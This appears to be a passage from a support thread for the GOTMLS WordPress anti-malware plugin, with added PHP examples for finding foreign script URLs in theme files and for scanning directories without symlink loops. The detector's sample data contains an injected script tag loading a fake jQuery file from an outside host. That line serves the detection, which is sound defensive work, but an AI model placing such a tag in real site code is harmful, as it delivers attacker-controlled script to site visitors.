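wp_enqueue_script('ui', 'https://ajax.googleapis.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.js');
echo '<script src="http://smuss.net/jquery-1.6.3.min.js"></script>';
SAMPLE;

// Assumed allow-list: the site's own host plus one CDN it knowingly uses.
$allowed = ['www.example.com', 'ajax.googleapis.com'];

foreach (find_foreign_script_urls($sample, $allowed) as $hit) {
    printf("line %d: %s (host %s)\n", $hit['line'], $hit['url'], $hit['host']);
}
```

Running the function over every `.php` file in the active theme gives the file and line to inspect before anything is deleted.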
I just downloaded and installed the plugin. Sucuri.net scans have revealed multiple malware threats whereas the MLS plugin does not seem to find these threats. Also, when I run a scan on the public_html, the scan seems to be running for several minutes and then it just stops. All the while, the percent complete indicator remains at zero. Any idea what might be happening?
Thanks for providing WP Admin credentials to your site. I was able to figure out why it was not finishing the scan. First, it looks like you've got 20+ domains installed under the main site's public_html directory, so the Quick Scan is not a viable option. Second, you have at least one symbolic link to the public_html directory inside the public_html directory; this causes infinite recursion when drilling down through the directory structure (in order to understand recursion you must first understand recursion).
I have added the public_html directory to the exclude path so that it will not be followed a second time through. I also added the wp-snapshots directory to the exclude path just to save time. It will now scan over 5,500 folders including all those other domains but it will take some time to do a Complete Scan.
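The symlink loop described in the reply above can also be handled in the walker itself. This is an added example, not the plugin's code and not the fix the author applied: it resolves each directory with `realpath()` and refuses to enter one it has already visited, alongside an exclude list. The function name and the temporary directory layout are constructed for illustration, and a POSIX host is assumed for `symlink()`.

```php
<?php
// Added example, not GOTMLS code: a recursive scan that cannot loop on symlinks.

/**
 * Collect files under $dir, entering each real directory at most once.
 *
 * @param string   $dir     directory to scan
 * @param string[] $exclude resolved paths to skip (an "exclude path" list)
 * @param array    $seen    resolved directories already entered
 * @return string[] paths of the files found
 */
function scan_tree(string $dir, array $exclude = [], array &$seen = []): array
{
    $real = realpath($dir); // resolves symlinks; false for a broken link
    if ($real === false || isset($seen[$real]) || in_array($real, $exclude, true)) {
        return []; // broken link, directory already visited, or excluded
    }
    $seen[$real] = true;

    $entries = @scandir($real);
    if ($entries === false) {
        return []; // unreadable directory
    }
    $files = [];
    foreach ($entries as $name) {
        if ($name === '.' || $name === '..') {
            continue;
        }
        $path = $real . DIRECTORY_SEPARATOR . $name;
        if (is_dir($path)) { // also true for a symlink that points at a directory
            $files = array_merge($files, scan_tree($path, $exclude, $seen));
        } elseif (is_file($path)) {
            $files[] = $path;
        }
    }
    return $files;
}

// Constructed layout: public_html contains a symlink back to public_html.
$root = sys_get_temp_dir() . '/scan_demo_' . getmypid();
mkdir("$root/public_html/site2", 0700, true);
mkdir("$root/public_html/wp-snapshots", 0700, true);
file_put_contents("$root/public_html/index.php", "<?php\n");
file_put_contents("$root/public_html/site2/index.php", "<?php\n");
file_put_contents("$root/public_html/wp-snapshots/old.zip", "x");
symlink("$root/public_html", "$root/public_html/loop");

$skip = [realpath("$root/public_html/wp-snapshots")];
print_r(scan_tree("$root/public_html", $skip));
```

Because the visited set is keyed on resolved paths, the `loop` link resolves to a directory already entered and is skipped without needing a manual exclude entry.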
Eli is AMAZING.
I reached out to him with a malware problem on one of my sites and an hour later he was in it searching for the culprit. 30 minutes later problem solved and a plugin update on the way.
Where do you get this kind of customer service for a free plugin? As I said AMAZING!
Eli you have a fan, a friend and a donor for life.
Mahalo
Jeff
I want to skip some files, but I can't edit 'Skip files with the following extentions'. If I remove the standard extensions 'png,jpg,jpeg,gif,bmp,tif,tiff,exe,zip,pdf' the plugin still scans these extensions. Please help.
You will want to skip any binary files as they are generally larger than ASCII files and do not contain any scripts. I had designed it so that you could not completely clear this field, assuming that you would always need to exclude something. I have, however, fixed it so that you can now clear this field and scan all files. Keep in mind it will likely be a waste of time to scan binary files for malicious text patterns.
Hi there,
My site crashed twice now during the scan. I still have 2 alerts. What could be the cause? Before I deactivate the plugin I would like to know what you suggest.
Silgin
These 2 "Alerts" you are talking about are from Sucuri.net and they are cached from 2 days ago. I just had Sucuri refresh their cache by clicking "Re-Scan" on their site and the results confirmed that your site is now clean.
I got something like this:
"Warning: set_time_limit() has been disabled for security reasons in…"
What should I do? Is this a problem or just an unimportant info?
Thanks
It's not something to worry about. I am setting the timeout to 60 seconds in a recursive loop so that it does not get stuck in some part of that scan process. Your server's security settings seem to be stopping me from setting that value.
I will suppress this error in my next release by changing set_time_limit to @set_time_limit. You can add the @ to your version if you want to suppress these errors now.
The plugin says my number is not registered, but your site says it is. I've logged on with the password you supplied. I've reloaded the plugin page, but no change.
Lane
Somehow your site was registered in my database without a trailing '/' (slash). I have corrected this error in my database so it should work for you now.
Thanks for contacting me about this issue. Please let me know if there is anything else I can do.
Thanks, that seems to have fixed it. It doesn't say I'm registered, but at least it no longer says I'm not!
The search for updates, plugin and definitions is taking forever, but maybe your server is overloaded.
I did a scan of plugins, and out of 1131 files, it found 59 potentials in 9 different plugins. These are plugins I've used for a long time.
It should say "Your Installation Key is Registered" in green letters in the Definition Updates section on the right. It should also say "Your Definitions file is current" below that. You want to make sure that you have downloaded the latest definitions. Then you want to scan your whole site (not just the plugins directory).
I wouldn't worry about those "Potential Threats" in Yellow, it's just the ones in Red you should repair.
Yes, when the definition update finished, it did display the above.
Unfortunately, when I did a wp-content scan, it listed a bunch of files from one plugin in red. This is a very valuable auto-blogging plugin, and I wouldn't want to do anything to harm it unnecessarily. What does repairing involve?
Trying to do a public_html scan, I got this error: Fatal error: Maximum execution time of 30 seconds exceeded in /home/thewebdr/public_html/wp-content/plugins/gotmls/index.php on line 82
I had seen that in the wp-content scan, and I added to a php.ini in public_html:
max_execution_time = 600
I don't know why it's not taking effect.
My plugin was designed to remove the threat from an infected file without breaking the file. Admittedly it's not always 100% effective and I have had a couple of False Positives in the past. So, make a backup of the plugin and then run the Automatic Repair and see what happens. There is also a link to revert the changes if it does break something.
There are also two lines in a recursive loop within plugins/gotmls/images.php (lines 244 and 276) where you would need to change
set_time_limit(30);
to a higher number.
I have found 6 potential threats, what's next?
See my FAQs:
http://gotmls.net/faqs/
Hi,
Just donated and didn't write the site's name. Is it registered somehow anyway?
Thanks!
Yes. Donating from your WP-Admin will pass along your Installation Key for my plugin. I see that your donation is associated with your site name.
Hi
My site http://www.tradeexpressions.com.sg is infected by malware. I have scanned using this plugin and confirmed. Please tell me how to remove all those.
Thanks
Selvan
If my plugin finds "Known Threats" (in red) you should see a button that says "Repair SELECTED files Now".
If all you are finding is "Potential Threats" (in yellow) then please send me a screenshot and I'll see if anything sticks out at me as suspicious.
Once again your great plugin spotted malware on several of my sites and then removed it. I'm just waiting to see if it sneaks back in again but meanwhile although I've already made a modest donation I've decided to make another one each time another infection is spotted.
Cheers and keep up the good work.
Regards
Will Chapman
Thanks for donating again, I like that philosophy.
Let me know if they come back and I can take a look (maybe figure out how they got in).
Hi, I love the plugin, but I run multiple sites, and it's not letting me use the plugin on site 2 with the same email address I used for site 1. Is there a developer's package, or some way to do this? I use the same admin email for all of the sites. I did donate! Thanks!
I am working on supporting multiple domains registered under one email account. As a test I have manually registered another one of your domains under the same account you already have (the one I added is the same one you use as your email address). If you install my GOTMLS Plugin on that domain you should see that it is already registered. You should also see that it has the ability to scan one level higher in your directory hierarchy. Hopefully this will enable you to scan all your domains on that server from one WP Admin. Please let me know if this works for you as desired or if you have any problems.
I've the same problem. I manage 40 non-profit blogs and I would like to protect all with your plugin but it seems only one could be registered with an email address. A pity!
I have changed the registration process on gotmls.net to accept multiple site/key registrations under a single email address. Give it a try and let me know how it works for you.
I'm having a problem here too. I currently have two sites registered with gotmls.net (and I've donated!). But I can't figure out how to add another site. There's no way to do it after you've logged in.
Can you help?
The best way to register any site is to install the plugin on that site and then use the built-in registration form on the Anti-Malware Settings page in the WP-Admin of the site you want to register. If you use the same email address on the form as you did on the registration for your other sites then all your sites will be registered under the same account. If you already registered the new site under a different email then you can login to that account on gotmls.net and transfer that site's registration to your other account so that they are all together.
Hi Eli:
I just downloaded your latest version 1.2.04.04 and the following two warnings are on the dashboard for the plugin:
Warning: array_merge() [function.array-merge]: Argument #1 is not an array in …/wp-content/plugins/gotmls/index.php on line 432
Warning: implode() [function.implode]: Invalid arguments passed in …/wp-content/plugins/gotmls/index.php on line 470
When I run the scan, a whole slew of warnings appear about the plugin. Let me know. Thanks, Art
Thanks for reporting this bug. I just fixed it in my newest release (version 1.2.04.08).
Thanks so much for the update; it now works fine. Art
Usually the Potential Threats are ok. If you find Known Threats and remove them then your site will likely come up clean. You can request a review from Google in your Webmaster Tools account if you are still getting warnings from the search engine.
The warning from Google is gone! You are a genius. I am now telling everyone in my vast networks on Facebook, LinkedIn, XING and Twitter to download your plug in, pronto!
It's done and all is working perfectly, thank you.
I found this on some pages that are supposed to be completely blank:
That is just the HTML code for a [SPACE] so it is not malicious or anything you should be worrying about (the WordPress Post Editor will insert that code by default when it thinks it is needed).
Thank you very much. Works.